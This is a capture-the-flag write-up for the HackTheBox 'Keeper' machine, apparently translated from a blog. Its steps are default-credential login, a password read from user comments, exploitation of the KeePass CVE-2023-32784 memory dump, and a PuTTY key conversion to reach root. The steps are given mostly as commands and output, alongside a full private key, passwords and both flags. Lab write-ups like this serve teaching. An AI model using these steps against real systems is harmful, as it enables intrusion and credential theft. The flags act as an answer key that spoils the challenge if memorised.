
HTB: Keeper [WriteUp]



Connect to the HTB server and start the target machine

Target IP: 10.10.11.227

Assigned IP: 10.10.16.7


1. How many open TCP ports are listening on Keeper?

Scan the target's ports with fscan:

fscan -nopoc -nobr -no -h {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop]
└─# fscan -nopoc -nobr -no -h 10.10.11.227

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
10.10.11.227:80 open
10.10.11.227:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.227       code:200 len:149    title:None
已完成 2/2
[*] 扫描结束,耗时: 572.329065ms

The scan shows the target has 2 open ports in total: 22 and 80.


2. What is the default password for the default user on Request Tracker (RT)?

Visit the target's port 80 in a browser: http://{TARGET_IP}

The page contains a link; clicking it redirects to tickets.keeper.htb, but the page that loads is blank.

Edit the hosts file and add a local DNS entry:

echo '{TARGET_IP} tickets.keeper.htb' >> /etc/hosts

Visit again in the browser: http://tickets.keeper.htb

Next, hand the question straight to Google: the RT default account is root and the default password is password.

Log in to the target's page directly with these credentials:

Account: root
Password: password

Click: Admin -> Users -> Select

Under Select Users you can see that, besides root, there is another user: lnorgaard


4. What is the lnorgaard user's password on Keeper?

Click the lnorgaard user name:

Scroll down to the comments on this user, which state the user's password: Welcome2023!

Account: lnorgaard

Password: Welcome2023!


5. Submit the flag located in the lnorgaard user's home directory.

Log in to the target's SSH server with the credentials obtained above:

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh lnorgaard@10.10.11.227
lnorgaard@10.10.11.227's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
You have mail.
Last login: Tue Aug  8 11:31:22 2023 from 10.10.14.23
lnorgaard@keeper:~$ whoami
lnorgaard

Find the location of user.txt and print its contents:

cat `find / -name 'user.txt' 2>/dev/null`

lnorgaard@keeper:~$ cat `find / -name 'user.txt' 2>/dev/null`
9eaf55f30303be882a65e5c440347354

USER_FLAG:9eaf55f30303be882a65e5c440347354


6. What is the 2023 CVE ID for a vulnerability in KeePass that allows an attacker access to the database's master password from a memory dump?

Check the current location and list all files in the current directory:

lnorgaard@keeper:~$ pwd
/home/lnorgaard
lnorgaard@keeper:~$ ls
RT30000.zip  user.txt

Unzip RT30000.zip:

lnorgaard@keeper:~$ unzip RT30000.zip
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp     
 extracting: passcodes.kdbx          
lnorgaard@keeper:~$ ls
KeePassDumpFull.dmp  passcodes.kdbx  RT30000.zip  user.txt

Neither extension looked familiar, so I handed both to an AI and asked what kind of files they are:

.dmp file:

  • Full name: Dump file, also called a memory or crash dump.
  • Purpose: usually generated automatically by the system or software when a program hits an error or exception, recording the program's state at that moment so developers can do fault analysis and debugging. For example, Windows produces a memory dump (.dmp) on a blue-screen error, which helps technicians determine what caused the crash.
  • How to open: use a dedicated debugging tool to view and analyse .dmp files, such as WinDbg on Windows.

.kdbx file:

  • Full name: the usual extension of a KeePass Password Safe database file.
  • Purpose: KeePass is an open-source password manager; the .kdbx file stores the user's passwords, usernames, website addresses and other sensitive information. The file is normally encrypted to protect the passwords.
  • How to open: open the .kdbx file with KeePass itself; the user must enter the correct master password or key file to access the stored passwords.
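As an added example (not from the original write-up), a small Python triage helper that identifies these two formats from their magic bytes instead of trusting the extension, reads the KDBX version, cipher and compression from the outer header, and the stream count and flags from a minidump header. The sample bytes are constructed inline and are not the files from the box.

```python
import struct
import uuid

# Magic numbers: KeePass 2.x .kdbx signature pair and the minidump "MDMP" signature.
KDBX_SIG = (0x9AA2D903, 0xB54BFB67)
MINIDUMP_SIG = 0x504D444D
KDBX_CIPHERS = {  # outer-header CipherID values used by KeePass 2.x
    uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff"): "AES-256-CBC",
    uuid.UUID("d6038a2b-8b6f-4cb5-a524-339a31dbb59a"): "ChaCha20",
}

def kdbx_outer_header(data: bytes, major: int) -> dict:
    """Walk the type/length/value outer header (KDBX 3: 2-byte lengths, KDBX 4: 4-byte)."""
    len_fmt, len_size = ("<I", 4) if major >= 4 else ("<H", 2)
    pos, out = 12, {}
    while pos + 1 + len_size <= len(data):
        field = data[pos]
        size = struct.unpack_from(len_fmt, data, pos + 1)[0]
        value = data[pos + 1 + len_size:pos + 1 + len_size + size]
        pos += 1 + len_size + size
        if field == 0:                      # EndOfHeader
            break
        if field == 2 and size == 16:       # CipherID
            cid = uuid.UUID(bytes=value)
            out["cipher"] = KDBX_CIPHERS.get(cid, str(cid))
        elif field == 3 and size == 4:      # CompressionFlags: 1 = gzip
            out["compression"] = "gzip" if struct.unpack("<I", value)[0] == 1 else "none"
        elif field == 11:                   # KdfParameters (KDBX 4 only), a VariantDictionary
            out["kdf_params_bytes"] = size
    out["header_bytes"] = pos
    return out

def identify(data: bytes) -> dict:
    """Classify by content, not by extension; return the fields a triage note needs."""
    if len(data) >= 32 and struct.unpack_from("<I", data)[0] == MINIDUMP_SIG:
        _, _, nstreams, _, _, ts, flags = struct.unpack_from("<IIIIIIQ", data)
        return {"type": "minidump", "streams": nstreams, "timestamp": ts, "flags": flags}
    if len(data) >= 12 and struct.unpack_from("<II", data) == KDBX_SIG:
        minor, major = struct.unpack_from("<HH", data, 8)
        return {"type": "kdbx", "version": f"{major}.{minor}", **kdbx_outer_header(data, major)}
    return {"type": "unknown"}

# Constructed samples (not the box's files): a KDBX 4.0 header with AES-256, gzip and a dummy KDF entry, and a minidump header.
SAMPLE_KDBX = (struct.pack("<IIHH", *KDBX_SIG, 0, 4)
               + b"\x02" + struct.pack("<I", 16) + uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff").bytes
               + b"\x03" + struct.pack("<I", 4) + struct.pack("<I", 1)
               + b"\x0b" + struct.pack("<I", 8) + b"\x00" * 8
               + b"\x00" + struct.pack("<I", 4) + b"\r\n\r\n")
SAMPLE_DMP = struct.pack("<IIIIIIQ", MINIDUMP_SIG, 0xA793, 13, 32, 0, 1692000000, 2) + b"\x00" * 32
```

Run identify() over both files pulled from the zip; a .kdbx that reports a KDBX 3.x version or a .dmp whose flags include full memory are the details worth recording in the incident notes.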

Download RT30000.zip to the local machine over SCP:

scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip .

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip .
lnorgaard@10.10.11.227's password:
RT30000.zip                                                       100%   83MB   1.2MB/s   01:07    
                                                                                                    
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
RT30000.zip

Hand this question straight to Google:

From the AI answer we know that .dmp is a dump file and may hold the .kdbx password, so we try to read information out of it with the exploit.

Download the exploit for CVE-2023-32784 and enter its directory:

git clone https://github.com/vdohney/keepass-password-dumper.git
cd keepass-password-dumper


7. What is the master password for passcodes.kdbx?

Parse the dump file:

dotnet run /home/kali/Desktop/temp/KeePassDumpFull.dmp

Password candidates (character positions):
Unknown characters are displayed as "●"
1.:     ●
2.:     ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M,
3.:     d,
4.:     g,
5.:     r,
6.:     ø,
7.:     d,
8.:      ,
9.:     m,
10.:    e,
11.:    d,
12.:     ,
13.:    f,
14.:    l,
15.:    ø,
16.:    d,
17.:    e,
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde

Successfully obtained the master password: dgrød med fløde

Since this exploit cannot handle non-ASCII characters and cannot recover the first character, we throw this string into Google and try to restore its original form.

The final master password obtained: rødgrød med fløde


8. What is the first line of the "Notes" section for the entry in the database containing a private SSH key?

Start the KeePass command-line interface:

kpcli

Open the passcodes.kdbx file:

open passcodes.kdbx

List all groups:

ls

Enter the passcodes group:

cd passcodes

List all groups:

ls

Enter the Network group:

cd Network

List all entries:

ls

Show entry 0 in full format:

show 0 -f

┌──(root㉿kali)-[/home/kali/Desktop]
└─# kpcli          

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> open passcodes.kdbx
Provide the master password: *************************

kpcli:/> ls
=== Groups ===
passcodes/

kpcli:/> cd passcodes
kpcli:/passcodes> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/passcodes> cd Network
kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)                                          
1. Ticketing System

kpcli:/passcodes/Network> show 0 -f

Title: keeper.htb (Ticketing Server)
Uname: root
 Pass: F4><3K0nd!
  URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
       Encryption: none
       Comment: rsa-key-20230519
       Public-Lines: 6
       AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
       8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
       EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
       Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
       FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
       LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
       Private-Lines: 14
       AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
       oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
       kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
       f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
       VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
       UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
       OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
       in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
       SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
       09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
       xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
       AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
       AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
       NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
       Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

From the entry output, the first line of the Notes section is: PuTTY-User-Key-File-3: ssh-rsa

The whole Notes section is in fact the root user's SSH private key in PuTTY's PPK format, stored unencrypted (Encryption: none).


9. Submit the flag located in the root user's home directory.

Write the entire Notes section into a file (named ssh_pri_key below):

PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
[the 14 private-key lines are omitted here; they are identical to the Notes output above]
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

Next, PuTTY's tooling can convert this key format back into an OpenSSH private key.

Install the key tool puttygen:

apt install putty-tools

Convert the PPK file to an OpenSSH private key with it:

puttygen ssh_pri_key -O private-openssh -o id_rsa

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls -l id_rsa
-rw------- 1 root root 1675 Oct 15 09:36 id_rsa
                                                                                                          
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat id_rsa     
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----
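Added example, not from the original write-up: a Python parser for the PPK header format shown above that reports the key algorithm, whether the private part was stored unencrypted (Encryption: none, as in this entry), and the OpenSSH public line plus SHA256 fingerprint, which is what a defender needs to match a leaked key against authorized_keys entries and sshd auth logs. The sample key is constructed inline and is not the key from the box; ssh_rsa_blob and make_ppk are helpers written here for the example.

```python
import base64
import hashlib
import struct

def ssh_rsa_blob(e: int, n: int) -> bytes:
    """SSH wire-format public key (the Public-Lines payload): string "ssh-rsa", mpint e, mpint n."""
    def mpint(x: int) -> bytes:
        raw = x.to_bytes(x.bit_length() // 8 + 1, "big")  # extra byte keeps the sign bit clear
        return struct.pack(">I", len(raw)) + raw
    return struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)

def parse_ppk(text: str) -> dict:
    """Read the header fields of a PPK v2/v3 file; the base64 line groups are joined."""
    lines, info, i = text.splitlines(), {}, 0
    while i < len(lines):
        key, _, val = lines[i].partition(":")
        val, i = val.strip(), i + 1
        if key.startswith("PuTTY-User-Key-File-"):
            info["version"], info["algorithm"] = int(key.rsplit("-", 1)[1]), val
        elif key in ("Public-Lines", "Private-Lines"):
            count = int(val)
            info[key], i = "".join(lines[i:i + count]), i + count
        else:
            info[key] = val
    return info

def audit_ppk(text: str) -> dict:
    """Algorithm, encryption state, comment, OpenSSH public line and fingerprint of a PPK."""
    info = parse_ppk(text)
    blob = base64.b64decode(info["Public-Lines"])
    fp = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return {
        "algorithm": info["algorithm"],
        "comment": info.get("Comment", ""),
        "unencrypted": info.get("Encryption", "none") == "none",
        "openssh_public": f"{info['algorithm']} {info['Public-Lines']} {info.get('Comment', '')}",
        "fingerprint": "SHA256:" + fp,  # same form as ssh-keygen -lf prints
    }

def make_ppk(blob: bytes, comment: str, encryption: str = "none") -> str:
    """Constructed PPK v3 text for the example (public part only; Private-MAC is a dummy)."""
    b64 = base64.b64encode(blob).decode()
    pub = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\n".join(["PuTTY-User-Key-File-3: ssh-rsa", f"Encryption: {encryption}",
                      f"Comment: {comment}", f"Public-Lines: {len(pub)}", *pub,
                      "Private-Lines: 0", "Private-MAC: " + "00" * 32]) + "\n"

# Constructed sample key (tiny modulus, not usable for SSH) so the example runs offline.
SAMPLE_BLOB = ssh_rsa_blob(65537, 0xC0FFEE1234567890ABCDEF)
SAMPLE_PPK = make_ppk(SAMPLE_BLOB, "rsa-key-example")
```

The fingerprint matches what ssh-keygen -lf reports for the corresponding OpenSSH public key, so it can be grepped directly in sshd "Accepted publickey" log lines.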
                                                                                                                                                                                                                 

Connect to the target's SSH server with this private key:

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh root@10.10.11.227 -i id_rsa
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Tue Aug  8 19:00:06 2023 from 10.10.14.41
root@keeper:~# whoami
root

Find the location of root.txt and print its contents:

cat `find / -name 'root.txt' 2>/dev/null`

ROOT_FLAG:c2dc23cb8bffab07116df7f112daf2d7


Original article: https://blog.csdn.net/qq_43007452/article/details/142946857
